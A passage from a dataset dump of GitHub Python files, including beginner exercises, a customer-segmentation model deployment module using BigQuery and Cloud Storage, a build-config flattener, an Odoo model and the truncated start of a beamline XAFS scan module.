int(input(\"Enter your second number\"))\n#print((num1 + num2) / 2))\n\n\n#foreName = input(\"What is your name?\")\n#age = str(21)\n#print(\"Hello \" + foreName + \" you are \" + age)\n\n\n#print(\"Dave Matravers\")\n#foreName = \"Dave\"\n#age = \"21\"\n#print(\"Hello \" + foreName + \", you are \" + age)\n\n\n\nsignName = \"Sign Shop\"\nuserName = \"Dave\"\n\nprint(signName)\nprint(\"Welcome to \" + signName + \", \" + userName + \".\")\n\ncustomerSign = input(\"What would you like the sign to read?\")\n\nsignLength = len(customerSign)\n\nsubTotal = signLength * 5\n\nshipping = 4.99\n\ngrandTotal = str(subTotal + shipping)\n\nprint(\"Your sign costs £\" + grandTotal)\n","repo_name":"matraversdavid/Level2_Programming","sub_path":"weekone.py","file_name":"weekone.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37618370343","text":"from collections import Counter\n\n\"\"\"\nGiven two strings, write a method to decide if one is a permutation of the other.\n\"\"\"\n\ndef is_permutation(string1: str, string2: str) -> bool:\n \"\"\"\n # proposition 1\n using hash map, we store unique characters as keys and their occurances in string as values for the first string\n for second string to be permutation of the first one, characters and their occurances of the second string must equal to \n the first string.\n so we iterate characters from the second string and if that character is present in the hashmap, we reduce its occurance\n if it is not present then it is not permutation\n time -> O(n)\n space -> O(m) where m is the number of unique characters.\n\n\n\n # proposition 2\n in order for two strings to be permutation to each other, their length must also be same.\n if two strings are sorted then they must be same\n\n time -> O(nlogn)\n space -> O(1)\n \"\"\"\n # solution 1\n # counter = Counter(string1)\n # for char in string2:\n # if char not in counter:\n # return 
False\n # if counter[char] == 1:\n # del counter[char]\n # continue\n # counter[char] -= counter[char] - 1\n # return len(counter) == 0\n\n # solution 2\n # return sorted(string1) == sorted(string2)\n\n\nstr1 = \"Cracking\"\nstr2 = \"rcaCking\"\nprint(is_permutation(str1, str2))\n","repo_name":"DiyorbekAzimqulov/tech_interviews","sub_path":"algorithmic problems/CTCI/ArrayAndString/isPermutation.py","file_name":"isPermutation.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"71235007453","text":"import json\n\nfrom common.Request.Request import Request\n\n\ndef parseRequest(request):\n try:\n data = json.loads(request)\n except:\n return \"Invalid Request\"\n req = Request(data[\"headers\"][\"HOST\"],data[\"headers\"][\"PORT\"],data[\"headers\"][\"ENDPOINT\"])\n req.setHeaders(data[\"headers\"])\n req.setBody(data[\"body\"])\n return req","repo_name":"glaukiol1/pyts","sub_path":"common/parseRequest.py","file_name":"parseRequest.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"74612701213","text":"import pandas as pd\nimport numpy as np\nimport time\nimport os\nimport re\nimport shutil\nimport pathlib\nfrom datetime import datetime, timedelta\nfrom google.cloud import storage # type: ignore\nfrom pickle import dump\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.metrics import confusion_matrix, classification_report\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom segmentation.downloader import cluster_model_downloader\nfrom segmentation.cluster_model import segmentation_constants as constants\nimport segmentation.cluster_model.utils as utils\nfrom segmentation.config.load_config import load_config\n\n# Config\nconfig = 
load_config()\n\n\nclass Classifier:\n # initialize the class\n def __init__(self, data_version):\n self._root_dir = config[\"root_dir\"]\n self._data_version = data_version\n\n def localize_hour(self, utc_hour, continent):\n if continent == \"North America\":\n local_hour = utc_hour + constants.NA_HOUR_DIFF\n elif continent == \"South America\":\n local_hour = utc_hour + constants.SA_HOUR_DIFF\n elif continent == \"Europe\":\n local_hour = utc_hour + constants.EU_HOUR_DIFF\n elif continent == \"Africa\":\n local_hour = utc_hour + constants.AF_HOUR_DFF\n elif continent == \"Asia\":\n local_hour = utc_hour + constants.AS_HOUR_DIFF\n else:\n local_hour = utc_hour\n # make sure there's no negatives in the localized hour\n if local_hour < 0:\n local_hour = local_hour + 24\n # lastly, make sure 24 is 0\n if local_hour == 24:\n local_hour = 0\n return local_hour\n\n def extract_os_group(self, user_agent):\n if constants.LINUX_AGENT_STR in user_agent:\n os_group = \"linux\"\n elif constants.ANDROID_AGENT_STR in user_agent:\n os_group = \"android\"\n elif constants.WIN10_AGENT_STR in user_agent:\n os_group = \"windows10\"\n elif (\n constants.WIN_AGENT_STR in user_agent\n and constants.WIN10_AGENT_STR not in user_agent\n ):\n os_group = \"windows_older\"\n elif constants.IPHONE_AGENT_STR in user_agent:\n os_group = \"iphone\"\n elif constants.MAC_AGENT_STR in user_agent:\n os_group = \"macintosh\"\n elif constants.APPLE_AGENT_STR in user_agent:\n os_group = \"apple_other\"\n else:\n os_group = \"other_os\"\n return os_group\n\n def extract_referrer_group(self, referrer, domain):\n social_list = constants.SOCAL_REF_LIST\n search_list = constants.SEARCH_REF_LIST\n nsmg_network = constants.NSMG_REF_LIST\n email = constants.EMAIL_REF_LIST\n own_website = [domain]\n if any(wildcard in referrer for wildcard in social_list):\n referrer_group = \"social\"\n elif any(wildcard in referrer for wildcard in search_list):\n referrer_group = \"search\"\n elif any(wildcard in referrer for 
wildcard in nsmg_network):\n referrer_group = \"NSMG\"\n elif any(wildcard in referrer for wildcard in own_website):\n referrer_group = \"own_website\"\n elif any(wildcard in referrer for wildcard in email):\n referrer_group = \"email\"\n else:\n referrer_group = \"other_referrer\"\n return referrer_group\n\n def preprocess_rf_data(self, df, domain):\n # preprocess the 'time' field - it should contain only the 'hour' - 0:24\n df[\"hour_of_day_utc\"] = df.apply(\n lambda x: int(str(x[\"time\"]).split(\" \")[1].split(\":\")[0]), axis=1\n )\n # approximately 'localize' the time by adjusting according ot the continent\n df[\"local_hour_proxy\"] = df.apply(\n lambda x: self.localize_hour(x[\"hour_of_day_utc\"], x[\"continent\"]), axis=1\n )\n # drop the original and helper column\n df = df.drop([\"time\", \"hour_of_day_utc\"], axis=1)\n # extract the referrer group approximation\n referrer_df = df.fillna(\"other\")\n referrer_df[\"referrer_group\"] = referrer_df.apply(\n lambda x: self.extract_referrer_group(x[\"referrer\"], domain), axis=1\n )\n # drop the original column\n referrer_df = referrer_df.drop([\"referrer\"], axis=1)\n os_df = referrer_df.copy()\n os_df[\"os_group\"] = os_df.apply(\n lambda x: self.extract_os_group(x[\"user_agent\"]), axis=1\n )\n # drop the original column\n os_df = os_df.drop([\"user_agent\"], axis=1)\n return os_df\n\n def download_rf_train(\n self,\n domain,\n lookback_period,\n end_date,\n bqclient,\n bqstorageclient,\n permutive_project,\n ):\n start_date = datetime.strftime(\n datetime.strptime(end_date, \"%Y-%m-%d\") - timedelta(int(lookback_period)),\n \"%Y-%m-%d\",\n )\n rf_train_query = f\"\"\"\nselect * except(rn) from (\nselect user_id, time, properties.client.domain, properties.client.referrer, properties.geo_info.continent, properties.client.user_agent,\nrow_number() over (partition by user_id order by time DESC) as rn\nfrom {permutive_project}.global_data.pageview_events\nwhere (properties.client.domain = '{domain}' or 
properties.client.domain = 'www.{domain}')\nand DATE(_PARTITIONTIME) <= '{end_date}' and DATE(_PARTITIONTIME) >= '{start_date}'\n) where rn = 1\n\"\"\"\n train_df = (\n bqclient.query(rf_train_query)\n .result()\n .to_dataframe(bqstorage_client=bqstorageclient)\n )\n return train_df\n\n def generate_confusion_matrix(self, prod_dir, test_y, test_preds):\n TEXT_COLOR = \"k\"\n conf_mat = confusion_matrix(test_y, test_preds)\n conf_mat_norm = conf_mat.astype(\"float\") / conf_mat.sum(axis=1)[:, np.newaxis]\n conf_mat_df = pd.DataFrame(conf_mat_norm)\n conf_mat_df = conf_mat_df.round(2)\n sns.heatmap(conf_mat_df, annot=True)\n plt.title(\"Confusion Matrix\", color=TEXT_COLOR, fontsize=20)\n plt.ylabel(\"True label\", color=TEXT_COLOR, fontsize=16, rotation=0, labelpad=30)\n plt.xlabel(\"Predicted label\", color=TEXT_COLOR, fontsize=16)\n plt.xticks(color=TEXT_COLOR, fontsize=12)\n plt.yticks(color=TEXT_COLOR, fontsize=12, rotation=0)\n plt.savefig(f\"{prod_dir}/rf_confusion_matrix.png\")\n plt.close()\n return True\n\n def evaluate_rf_fit(self, prod_dir, df_test, encoder, clf):\n categorical_features_df_test = df_test[\n [\"domain\", \"continent\", \"referrer_group\", \"os_group\"]\n ]\n ohe_array_test = encoder.transform(categorical_features_df_test)\n ohe_df_test = pd.DataFrame(\n ohe_array_test,\n index=categorical_features_df_test.index,\n columns=encoder.get_feature_names(),\n )\n # finally, let's add the two other columns to this df to have a compelete, good-to-go df\n df_test_enc = ohe_df_test.join(df_test[[\"local_hour_proxy\", \"cluster\"]])\n test_y, test_x = (\n df_test_enc[\"cluster\"],\n df_test_enc.loc[:, df_test_enc.columns != \"cluster\"],\n )\n # predict and run a classification report\n test_preds = clf.predict(test_x)\n report = classification_report(test_y, test_preds, output_dict=True)\n scoring_df = pd.DataFrame(report)\n scoring_df.to_csv(f\"{prod_dir}/rf_classification_report.csv\")\n # finally, let's generate and persist a confusion matrix\n 
self.generate_confusion_matrix(prod_dir, test_y, test_preds)\n return True\n\n def fit_and_evaluate_rf_models(self, prod_dir, preprocessed_df):\n # let's set the random seed to be used downstream\n random_state = constants.RANDOM_SEED\n df_train, df_test = train_test_split(\n preprocessed_df, train_size=0.8, test_size=0.2, random_state=random_state\n )\n # finally, let's fit a one-hot encoder for our categorical variables, and transform the data\n # let's first isolate our categorical variables in a separate df\n categorical_features_df = df_train[\n [\"domain\", \"continent\", \"referrer_group\", \"os_group\"]\n ]\n # instantiate and fit the encoder\n encoder = OneHotEncoder(handle_unknown=\"ignore\", sparse=False)\n encoder.fit(categorical_features_df)\n # persist the encoder\n encoder_file = f\"{prod_dir}/rf_ohe_encoder.pkl\"\n dump(encoder, open(encoder_file, \"wb\"))\n ohe_array = encoder.transform(categorical_features_df)\n ohe_df = pd.DataFrame(\n ohe_array,\n index=categorical_features_df.index,\n columns=encoder.get_feature_names(),\n )\n # finally, let's add the two other columns to this df to have a compelete, good-to-go df\n df_train_enc = ohe_df.join(df_train[[\"local_hour_proxy\", \"cluster\"]])\n # let's split the targets from the features\n train_y, train_x = (\n df_train_enc[\"cluster\"],\n df_train_enc.loc[:, df_train_enc.columns != \"cluster\"],\n )\n # and fit and persist the model\n clf = RandomForestClassifier(\n min_samples_split=constants.RF_MIN_SAMPLES_SPLIT,\n class_weight=\"balanced\",\n verbose=0,\n random_state=random_state,\n )\n clf.fit(train_x, train_y)\n model_name = f\"{prod_dir}/rf_classifier.sav\"\n dump(clf, open(model_name, \"wb\"))\n # finally, let's evaluate the fit\n self.evaluate_rf_fit(prod_dir, df_test, encoder, clf)\n return True\n\n def fit_random_forest(self, prod_dir, domain, lookback_period, end_date):\n # to fit a random forest classifier, we need to pass a few steps\n # 1) download training data from bigquery\n # 
2) preprocess data - as a lambda (to be used in serving as well?)\n # 3) merge with predictions in prod_dir\n # 4) fit encoder and model - persist artefacts in prod_dir\n # 5) evaluate model - persist classification report in prod_dir\n # let's first instantiate the clients and get project_ids\n runtype = \"prediction\"\n downloader = cluster_model_downloader.ClusterDownloader(\n runtype, self._data_version\n )\n (\n bqclient,\n bqstorageclient,\n pulldata_project,\n permutive_project,\n ) = downloader.get_clients()\n # call the generator method\n features_df = self.download_rf_train(\n domain,\n lookback_period,\n end_date,\n bqclient,\n bqstorageclient,\n permutive_project,\n )\n # merge with the predictions, and leave only those rows where there is a cluster prediction\n pred_df = pd.read_csv(f\"{prod_dir}/fit_data_predictions.csv\", index_col=0)[\n [\"user_id\", \"cluster\"]\n ]\n train_df = pd.merge(\n features_df, pred_df, how=\"left\", left_on=[\"user_id\"], right_on=[\"user_id\"]\n )\n train_df = train_df[~train_df[\"cluster\"].isna()]\n # now we have a dataframe with the required data\n # let's preprocess\n preprocessed_df = self.preprocess_rf_data(train_df, domain)\n # now, we need to fit a one-hot encoder and transform the data accordingly\n # but first - split for train and test\n preprocessed_df = preprocessed_df.set_index(\"user_id\")\n # finally, let's fit the encoder and model\n self.fit_and_evaluate_rf_models(prod_dir, preprocessed_df)\n return True\n\n\nclass Deployer:\n # initialize the class\n def __init__(self, params, data_version, model_version):\n self._root_dir = config[\"root_dir\"]\n self._params = params\n self._data_version = data_version\n self._model_version = model_version\n\n def upload_to_storage(self, project_id, bucket_name, source_file, target_file):\n client = storage.Client(project=project_id)\n bucket = client.bucket(bucket_name)\n blob = bucket.blob(target_file)\n with open(source_file, \"rb\") as my_file:\n 
blob.upload_from_file(my_file)\n\n def remove_previous_deployment(self, project_id, bucket_name, domain):\n client = storage.Client(project=project_id)\n bucket = client.get_bucket(bucket_name)\n blobs = bucket.list_blobs(prefix=domain)\n for blob in blobs:\n blob.delete()\n\n def fit_rf_classifier(self, domain, best_model_dir, prod_dir):\n print(f\"Fitting random forest classifier for {domain}'s best clustering model.\")\n # if so, first, let's also move the fit predictions to the deploy folder\n fit_pred_filename_candidates = [\n item\n for item in os.listdir(best_model_dir)\n if item == \"fit_data_predictions.csv\"\n ]\n assert len(fit_pred_filename_candidates) == 1\n fit_pred_filename = fit_pred_filename_candidates[0]\n from_fit_pred = pathlib.Path(f\"{best_model_dir}/{fit_pred_filename}\")\n to_fit_pred = pathlib.Path(f\"{prod_dir}/{fit_pred_filename}\")\n shutil.copy(from_fit_pred, to_fit_pred)\n # lastly, let's extract the parameters we need for the RF fitting process\n # we already have domain, prod_dir, predictions and we need end_date and lookback_period\n end_date = re.split(\"/|\\\\\\\\\", best_model_dir.split(\"fit_for_\")[-1])[0]\n lookback_period = re.split(\"/|\\\\\\\\\", best_model_dir.split(\"lookback_\")[-1])[0]\n # let's call the method to fit a model and send artefacts to prod_dir\n classifier = Classifier(self._data_version)\n classifier.fit_random_forest(prod_dir, domain, lookback_period, end_date)\n\n def push_to_storage(self, domain, best_model_dir, prod_dir):\n print(f\"Deploying model configuration to storage for {domain} production.\")\n runtype = \"prediction\"\n downloader = cluster_model_downloader.ClusterDownloader(\n runtype, self._data_version\n )\n (\n bqclient,\n bqstorageclient,\n pulldata_project,\n permutive_project,\n ) = downloader.get_clients()\n project_id = pulldata_project\n bucket = constants.STORAGE_BUCKET\n # lets remove previous deployments from bucket\n self.remove_previous_deployment(project_id, bucket, domain)\n\n 
# copy all items\n for item in os.listdir(prod_dir):\n source_file = f\"{prod_dir}/{item}\"\n # we need to somehow pass to storage the lookback_period variable\n # to be used during prediction\n # let's insert that in the name of the fit_data_predictions.csv file\n if item == \"fit_data_predictions.csv\":\n lookback_period = re.split(\n \"/|\\\\\\\\\", best_model_dir.split(\"lookback_\")[-1]\n )[0]\n target_file = f\"{domain}/lookback_{lookback_period}__{item}\"\n else:\n target_file = f\"{domain}/{item}\"\n self.upload_to_storage(project_id, bucket, source_file, target_file)\n\n def move_files_to_prod(\n self,\n ):\n self._params[\"domains\"] = [\n utils.clean_domains(i) for i in self._params[\"domains\"]\n ]\n # let's go over each domain individually\n for domain in self._params[\"domains\"]:\n print(f\"Moving {domain} best model artefacts to prod dir.\")\n # within the folder for the evaluation of the models for each domain, get all 'shortlist' files - may be more than one\n # and we want to union these; do we?\n # getting the model_dir of the top model\n shortlist_metrics_dir = (\n f\"{self._root_dir}/evaluation/v_{self._model_version}/{domain}\"\n )\n shortlist_metrics_files = [\n item\n for item in os.listdir(shortlist_metrics_dir)\n if \"_shortlist_\" in item\n ]\n # let's instantiate a list to hold all the dataframes that we'll read\n shortlist_dfs_list = []\n for shortlist_file in shortlist_metrics_files:\n shortlist_df = pd.read_csv(\n f\"{shortlist_metrics_dir}/{shortlist_file}\", index_col=0\n )\n shortlist_dfs_list.append(shortlist_df)\n shortlists_df = pd.concat(shortlist_dfs_list)\n # let's sort by by 'weighted_profiling_score' ascending = False\n # TODO - move the sorting dim to constants?\n # in case there are ties, let's add the other metrics by order of importance we see\n shortlists_df.sort_values(\n [\"ranking_score\", \"cluster_variance\", \"centroid_similarity\"],\n ascending=[False, True, False],\n inplace=True,\n )\n # filter only the 
target models remain\n if self._params[\"target_n_clusters\"]:\n shortlists_df = shortlists_df[\n shortlists_df[\"n_clusters\"].isin(self._params[\"target_n_clusters\"])\n ]\n if self._params[\"target_lookback\"]:\n shortlists_df = shortlists_df[\n shortlists_df[\"lookback_period\"].isin(\n self._params[\"target_lookback\"]\n )\n ]\n # and now to select and move to prod the best model we want to find its dir\n best_model_dir = shortlists_df.iloc[0, :][\"model_dir\"]\n # let's now create a folder to house the model itself, along with its artefacts\n timestamp = round(time.time())\n prod_dir = f\"{self._root_dir}/deployment/v_{self._model_version}/{domain}/deployment_{timestamp}\"\n pathlib.Path(prod_dir).mkdir(parents=True, exist_ok=True)\n # now we have both the target directory and the source directory;\n # let's copy all the required artefacts, including some we'll get upper in the parameter stream\n # first, let's simply copy the three items we need from the model dir to the target dir\n # namely: the model itself (.sav), and the profiles for the fit data (_profiles_fit.csv)\n model_filename_candidates = [\n item for item in os.listdir(best_model_dir) if \"clusters.sav\" in item\n ]\n assert len(model_filename_candidates) == 1\n model_filename = model_filename_candidates[0]\n from_file_model = pathlib.Path(f\"{best_model_dir}/{model_filename}\")\n to_file_model = pathlib.Path(f\"{prod_dir}/{model_filename}\")\n shutil.copy(from_file_model, to_file_model)\n # repeat for the profile\n profile_filename_candidates = [\n item\n for item in os.listdir(best_model_dir)\n if \"_profiles_fit.csv\" in item\n ]\n\n for profile_filename in profile_filename_candidates:\n from_file_profile = pathlib.Path(f\"{best_model_dir}/{profile_filename}\")\n to_file_profile = pathlib.Path(f\"{prod_dir}/{profile_filename}\")\n shutil.copy(from_file_profile, to_file_profile)\n\n # repeat for the scaler\n scaler_path = (\n \"/\".join(re.split(\"/|\\\\\\\\\", 
best_model_dir.split(\"_clusters\")[0])[:-1])\n + \"/scaler.pkl\"\n )\n from_file_scaler = pathlib.Path(f\"{scaler_path}\")\n to_file_scaler = pathlib.Path(f\"{prod_dir}/scaler.pkl\")\n shutil.copy(from_file_scaler, to_file_scaler)\n # a little tricky part here - also move the 'selection_for_{hash}.csv', if the model comes from that selection\n model_selection_hash = \"/\".join(\n re.split(\"/|\\\\\\\\\", best_model_dir.split(\"_clusters\")[0])[:-1]\n ).split(\"_\")[-1]\n # now we have the hash of the feature selection that the best model has\n # let's inspect the folder above the scaler (selection folder) and get all .csv files\n # they are all the specific feature selections for downstream models\n # if our best model is one of those models, we need to copy that .csv to prod\n selection_folder = \"/\".join(\n re.split(\"/|\\\\\\\\\", best_model_dir.split(\"selected_features_\")[0])[:-1]\n )\n selection_files = [\n item\n for item in os.listdir(selection_folder)\n if \"selection_for_\" in item\n ]\n selection_files_hashes = [\n item.split(\"_\")[-1].split(\".\")[0] for item in selection_files\n ]\n if model_selection_hash in selection_files_hashes:\n from_file_selector = pathlib.Path(\n f\"{selection_folder}/selection_for_{model_selection_hash}.csv\"\n )\n to_file_selector = pathlib.Path(\n f\"{prod_dir}/selection_for_{model_selection_hash}.csv\"\n )\n shutil.copy(from_file_selector, to_file_selector)\n # finally, let's also move the last artefact - the imputer\n imputer_path = (\n \"/\".join(re.split(\"/|\\\\\\\\\", best_model_dir.split(\"outliers_\")[0])[:-1])\n + \"/imputer.pkl\"\n )\n from_file_imputer = pathlib.Path(f\"{imputer_path}\")\n to_file_imputer = pathlib.Path(f\"{prod_dir}/imputer.pkl\")\n shutil.copy(from_file_imputer, to_file_imputer)\n # finally, let's see if we want to fit a random forest classifier for the model\n if self._params[\"fit_rf_classifiers\"]:\n self.fit_rf_classifier(domain, best_model_dir, prod_dir)\n # finally, let's push the 
artefacts to google cloud storage\n if self._params[\"push_to_storage\"]:\n self.push_to_storage(domain, best_model_dir, prod_dir)\n","repo_name":"vamsy517/Data-Architecture","sub_path":"ingest_engine/segmentation/cluster_model/deployment.py","file_name":"deployment.py","file_ext":"py","file_size_in_byte":21980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9702362644","text":"import sys\n\nfrom google.protobuf import text_format\nfrom infra.libs.buildbucket.proto.config import project_config_pb2\nfrom infra.libs.buildbucket.swarming import flatten_swarmingcfg\nfrom infra.libs.protoutil import multiline_proto\n\n\nUSAGE = '''Usage:\nflatten_buildbucket_cfg [INPUT_FILE]\n\nWhere INPUT_FILE is a text format buildbucket config (\nhttp://luci-config.appspot.com/schemas/projects:buildbucket.cfg)\n\nIf INPUT_FILE is \"-\" or is not specified, will read from standard in.'''\n\n\ndef _normalize_acls(acls):\n \"\"\"Normalizes a RepeatedCompositeContainer of Acl messages.\"\"\"\n for a in acls:\n if a.identity and ':' not in a.identity:\n a.identity = 'user:%s' % a.identity\n sort_key = lambda a: (a.role, a.group, a.identity)\n acls.sort(key=sort_key)\n for i in xrange(len(acls) - 1, 0, -1):\n if sort_key(acls[i]) == sort_key(acls[i - 1]):\n del acls[i]\n\n\ndef _expand_auto_builder_dimension(b):\n if (b.auto_builder_dimension == project_config_pb2.YES and\n not any(d.startswith('builder:') for d in b.dimensions)):\n b.dimensions.append('builder:%s' % b.name)\n b.auto_builder_dimension = project_config_pb2.UNSET\n\n\ndef _remove_noop_dimensions(b):\n \"\"\"Removes dimensions that look like \":\", they are noop.\"\"\"\n dims = list(b.dimensions)\n b.ClearField('dimensions')\n for d in dims:\n chunks = d.split(':')\n if len(chunks) != 2 or chunks[1]:\n b.dimensions.append(d)\n\n\ndef _move_swarming_defaults(b, swarming):\n if not b.swarming_host:\n b.swarming_host = swarming.hostname\n if (not 
b.HasField('task_template_canary_percentage') and\n swarming.HasField('task_template_canary_percentage')):\n b.task_template_canary_percentage.value = (\n swarming.task_template_canary_percentage.value)\n\n\ndef flatten(orig):\n pbtext = multiline_proto.parse_multiline(orig)\n project_cfg = project_config_pb2.BuildbucketCfg()\n text_format.Merge(pbtext, project_cfg)\n acl_sets_by_name = {a.name: a for a in project_cfg.acl_sets}\n builder_mixins_by_name = {m.name: m for m in project_cfg.builder_mixins}\n for bucket_cfg in project_cfg.buckets:\n # Inline ACL sets.\n for name in bucket_cfg.acl_sets:\n acl_set = acl_sets_by_name.get(name)\n if not acl_set:\n raise ValueError(\n 'referenced acl_set not found.\\n'\n 'Bucket: %r\\n'\n 'ACL set name: %r\\n', bucket_cfg.name, name\n )\n bucket_cfg.acls.extend(acl_set.acls)\n bucket_cfg.ClearField('acl_sets')\n _normalize_acls(bucket_cfg.acls)\n if bucket_cfg.HasField('swarming'):\n # Pull builder defaults out and apply default pool.\n defaults = bucket_cfg.swarming.builder_defaults\n bucket_cfg.swarming.ClearField('builder_defaults')\n if not any(d.startswith('pool:') for d in defaults.dimensions):\n defaults.dimensions.append('pool:' + bucket_cfg.name)\n for b in bucket_cfg.swarming.builders:\n flatten_swarmingcfg.flatten_builder(b, defaults, builder_mixins_by_name)\n _expand_auto_builder_dimension(b)\n _remove_noop_dimensions(b)\n _move_swarming_defaults(b, bucket_cfg.swarming)\n b.dimensions.sort()\n # These settings have been \"expanded\" by _move_swarming_defaults.\n bucket_cfg.swarming.ClearField('hostname')\n bucket_cfg.swarming.ClearField('task_template_canary_percentage')\n # Sort builders by name\n bucket_cfg.swarming.builders.sort(key=lambda x: x.name)\n # Sort top-level entries by name\n project_cfg.buckets.sort(key=lambda x: x.name)\n # Clear fields that have been expanded and are now irrelevant.\n project_cfg.ClearField('acl_sets')\n project_cfg.ClearField('builder_mixins')\n return 
text_format.MessageToString(project_cfg, as_utf8=True)\n\n\ndef main(argv):\n if len(argv) >= 2:\n return USAGE\n if not argv or argv[0] == '-':\n input_file = sys.stdin\n else:\n input_file = open(argv[0])\n print(flatten(input_file.read()))\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"xinghun61/infra","sub_path":"infra/tools/flatten_buildbucket_cfg/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"17899634692","text":"# -*- coding: utf-8 -*-\n\nfrom xml.etree.ElementTree import TreeBuilder\nfrom odoo import models, fields, api\n\n\nclass RankModel(models.Model):\n _name = 'touradv_ranks.rank_model'\n _description = 'touradv_ranks.rank_model'\n\n name = fields.Char(string=\"name\",help=\"Rank name\",required=True,index=True)\n game_id = fields.Many2one(\"tournament_app.game_model\",string='Game',help=\"Team\",required=True)\n leveled = fields.Integer(string=\"Leveled\",required=True)\n image = fields.Binary(string=\"Image\")\n \n\n","repo_name":"JavganJG/TournamentRanks_app","sub_path":"touradv_ranks/models/rank_model.py","file_name":"rank_model.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"27237009365","text":"from bluesky.plans import scan_nd, count\nfrom bluesky.plan_stubs import sleep, mv, null\nfrom bluesky.preprocessors import subs_decorator, finalize_wrapper\n#from databroker.core import SingleRunCache\n\nimport numpy, os, re, shutil, uuid\nimport textwrap, configparser, datetime\nfrom cycler import cycler\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom PIL import Image\nfrom tiled.client import from_profile\n\nfrom urllib.parse import quote\n\nfrom BMM.db import file_resource\nfrom BMM.demeter import toprj\nfrom BMM.derivedplot import DerivedPlot, close_all_plots, 
close_last_plot\nfrom BMM.dossier import BMMDossier\nfrom BMM.functions import countdown, boxedtext, now, isfloat, inflect, e2l, etok, ktoe, present_options, plotting_mode\nfrom BMM.functions import PROMPT, DEFAULT_INI\nfrom BMM.functions import error_msg, warning_msg, go_msg, url_msg, bold_msg, verbosebold_msg, list_msg, disconnected_msg, info_msg, whisper\nfrom BMM.gdrive import copy_to_gdrive, synch_gdrive_folder, rsync_to_gdrive\nfrom BMM.kafka import kafka_message\nfrom BMM.linescans import rocking_curve\nfrom BMM.logging import BMM_log_info, BMM_msg_hook, report, img_to_slack, post_to_slack\nfrom BMM.metadata import bmm_metadata, display_XDI_metadata, metadata_at_this_moment\nfrom BMM.modes import get_mode, describe_mode\nfrom BMM.motor_status import motor_sidebar, motor_status\nfrom BMM.periodictable import edge_energy, Z_number, element_name\nfrom BMM.resting_state import resting_state_plan\nfrom BMM.suspenders import BMM_suspenders, BMM_clear_to_start, BMM_clear_suspenders\nfrom BMM.xdi import write_XDI\nfrom BMM.xafs_functions import conventional_grid, sanitize_step_scan_parameters\n\nfrom BMM import user_ns as user_ns_module\nuser_ns = vars(user_ns_module)\n\n#from __main__ import db\nfrom BMM.user_ns.base import db, startup_dir, bmm_catalog\nfrom BMM.user_ns.dwelltime import _locked_dwell_time, use_4element, use_1element\nfrom BMM.user_ns.detectors import quadem1, vor, xs, xs1, ic0\n\ntry:\n from bluesky_queueserver import is_re_worker_active\nexcept ImportError:\n # TODO: delete this when 'bluesky_queueserver' is distributed as part of collection environment\n def is_re_worker_active():\n return False\n\n\n\n# p = scan_metadata(inifile='/home/bravel/commissioning/scan.ini', filename='humbleblat.flarg', start=10)\n# (energy_grid, time_grid, approx_time) = conventional_grid(p['bounds'],p['steps'],p['times'],e0=p['e0'])\n# then call bmm_metadata() to get metadata in an XDI-ready format\n\n\n\ndef next_index(folder, stub):\n '''Find the next numeric 
filename extension for a filename stub in folder.'''\n listing = os.listdir(folder)\n r = re.compile(re.escape(stub) + '\\.\\d+')\n results = sorted(list(filter(r.match, listing)))\n if len(results) == 0:\n return 1\n return int(results[-1][-3:]) + 1\n\n## need more error checking:\n## * k^2 times\n## * switch back to energy units after a k-valued boundary?\n## * pre-edge k-values steps & times\n\n\n \n\n\ndef scan_metadata(inifile=None, **kwargs):\n \"\"\"Typical use is to specify an INI file, which contains all the\n metadata relevant to a set of scans. This function is called with\n one argument:\n\n parameters = scan_metadata(inifile='/path/to/inifile')\n\n inifile: fully resolved path to INI file describing the measurement.\n\n A dictionary of metadata is returned.\n\n As part of a multi-scan plan (i.e. a macro), individual metadata\n can be specified as kwargs to override values in the INI file.\n The kwarg keys are the same as the keys in the dictionary which is\n returned:\n\n Parameters\n ----------\n folder : str\n folder for saved XDI files\n filename : str\n filename stub for saved XDI files\n experimenters [str] \n names of people involved in this measurements\n e0 : float\n edge energy, reference value for energy grid\n element : str\n one- or two-letter element symbol\n edge : str\n K, L3, L2, or L1\n sample : str\n description of sample, perhaps stoichiometry\n prep : str\n a short statement about sample preparation\n comment : str\n user-supplied comment about the data\n nscan : int\n number of repetitions\n start : int\n starting scan number, XDI file will be filename.###\n snapshots : bool\n True = capture analog and XAS cameras before scan sequence\n usbstick : bool\n True = munge filenames so they can be written to a VFAT USB stick\n rockingcurve [bool] \n True = measure rocking curve at pseudo channel cut energy\n lims : bool\n False = force both htmlpage and snapshot to be false\n htmlpage : bool\n True = capture dossier of a scan sequence as 
a static html page\n bothways : bool\n True = measure in both monochromator directions\n channelcut : bool\n True = measure in pseudo-channel-cut mode\n ththth : bool\n True = measure using the Si(333) reflection\n mode : str\n transmission, fluorescence, or reference -- how to display the data\n bounds : list\n scan grid boundaries (not kwarg-able at this time)\n steps : list\n scan grid step sizes (not kwarg-able at this time)\n times : list\n scan grid dwell times (not kwarg-able at this time)\n\n Any or all of these can be specified. Values from the INI file\n are read first, then overridden with specified values. If values\n are specified neither in the INI file nor in the function call,\n (possibly) sensible defaults are used.\n\n \"\"\"\n #frame = inspect.currentframe() # see https://stackoverflow.com/a/582206 and\n #args = inspect.getargvalues(frame)[3] # https://docs.python.org/3/library/inspect.html#inspect.getargvalues\n\n BMMuser, dcm = user_ns['BMMuser'], user_ns['dcm']\n parameters = dict()\n\n if inifile is None:\n print(error_msg('\\nNo inifile 